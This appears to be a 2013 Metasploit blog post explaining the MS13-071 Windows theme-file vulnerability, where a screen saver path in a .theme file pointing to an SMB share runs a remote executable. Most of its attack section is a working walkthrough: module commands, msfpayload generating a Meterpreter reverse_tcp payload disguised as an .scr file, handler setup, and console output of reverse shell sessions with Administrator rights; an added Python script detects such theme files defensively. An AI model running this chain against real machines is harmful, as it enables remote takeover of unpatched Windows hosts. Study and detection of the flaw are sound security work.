Change the Theme, Get a Shell: Remote Code Execution with MS13-071

Blog Post created by juan.vazquez Employee on Sep 25, 2013

Recently we've added an exploit for MS13-071 to Metasploit. Rated as "Important" by Microsoft, this remote code execution vulnerability, found by Eduardo Prado, affects Windows XP and Windows 2003 environments and is triggered by handling specially crafted themes. In this blog post we would like to discuss the vulnerability and give some helpful tips for exploiting it from Metasploit.

 

First of all, the bug occurs while handling the [boot] section of .theme files, where an arbitrary path can be used as the screen saver:

 

 

[Image: boot_section.png]

 

Since SCR files are just Windows executables, the vulnerability can be exploited by placing a malicious EXE on a shared folder and distributing a malicious .theme that references the remote screen saver, for example "SCRNSAVE.EXE=\\host\share\exploit.scr". When the victim opens the .theme and visits the Screen Saver tab, the payload is executed:

 

[Image: payload_exec.png]

 

Code execution is also triggered if the victim installs the malicious theme and leaves the computer idle until Windows tries to display the screen saver.
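
A defensive check for the condition described above, as an added example that is not part of the original post or of Metasploit: a Python triage function that extracts SCRNSAVE.EXE from the [boot] section of a .theme file and flags UNC or non-system paths. The function names, the allow-list of system directories and the sample themes are assumptions constructed for illustration.

```python
# Added example: triage a .theme file for risky screen saver references.
SYSTEM_PREFIXES = ("%windir%\\", "%systemroot%\\", "c:\\windows\\")  # assumed allow-list

def decode_theme(data):
    """Theme files may be UTF-16 (with BOM) or single-byte text."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")

def screensaver_entries(text):
    """Yield SCRNSAVE.EXE values from [boot]; INI names are case-insensitive."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "boot" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "scrnsave.exe":
                yield value.strip().strip('"')

def classify(path):
    """Label a screen saver path: none, remote-unc, system or non-system."""
    p = path.replace("/", "\\").lower()
    if not p:
        return "none"
    if p.startswith("\\\\"):  # \\host\share\... is fetched over SMB
        return "remote-unc"
    if p.startswith(SYSTEM_PREFIXES) and ".." not in p:
        return "system"
    return "non-system"

def scan_theme(data):
    """Return [(path, verdict)] for each screen saver reference in a theme blob."""
    return [(p, classify(p)) for p in screensaver_entries(decode_theme(data))]

# Constructed samples: the UNC value is the example path quoted in the post.
SAMPLE_REMOTE = "\r\n".join(
    ["[Theme]", "DisplayName=Demo", "[Boot]",
     r"ScrnSave.exe=\\host\share\exploit.scr"]).encode("utf-16")
SAMPLE_LOCAL = b"[boot]\r\nSCRNSAVE.EXE=%WinDir%\\system32\\logon.scr\r\n"

if __name__ == "__main__":
    for name, blob in (("remote", SAMPLE_REMOTE), ("local", SAMPLE_LOCAL)):
        print(name, scan_theme(blob))
```

Any verdict other than none or system marks a theme that deserves review before it reaches a user.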

 

To fix the issue, the Microsoft patch adds a new function, EnsureInfoxScreenSaver(), which tries to verify the screen saver path:

 

[Image: patch.png]

 

With the vulnerability analyzed, writing a file format exploit and using it isn't hard if you take two things into account:

 

  • There is a malicious .theme file, which the victim must open.
  • There is a payload embedded into an EXE and disguised as an SCR, which must be distributed through a shared folder.

 

That said, let's see how to use the current Metasploit module, which allows two operation modes:

 

  • Use an external shared resource (Samba Server or Windows shared folder) to deploy the malicious screen saver. In this case:


1) Configure the UNCPATH option:

 

msf exploit(ms13_071_theme) > set UNCPATH \\\\192.168.172.243\\exploit\\exploit.scr
UNCPATH => \\192.168.172.243\exploit\exploit.scr
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Remember to share the malicious EXE payload as \\192.168.172.243\exploit\exploit.scr
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme

 

2) Deploy the payload, embedded into an exe, on the UNCPATH location:

 

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/exploit.scr

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}

 

3) Finally, run a handler for the payload, distribute the malicious .theme file (generated in step 1) and wait for sessions:

 

msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1668) at 2013-09-18 13:57:25 -0500

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

 

 

  • Use the SMBServer support embedded in the module. In this case, just configure the SRVHOST option to listen on an address reachable by the victims, and let the embedded SMBServer mixin do the work. Distribute the .theme file and wait for sessions:

 

msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\JalVNbsrN\sCOmK.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1637) at 2013-09-18 13:31:27 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

 

The SMBServer mixin needs (root) privileges to bind to port 445/TCP. It will also fail if the port is busy (common on Windows environments or Samba servers). Since the code overriding the SMBServer mixin is brand new, I'd love to hear from you if it worked for you. Remember it has been tested only on Windows XP SP3 and Windows 2003 SP2, the current targets for this exploit.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.
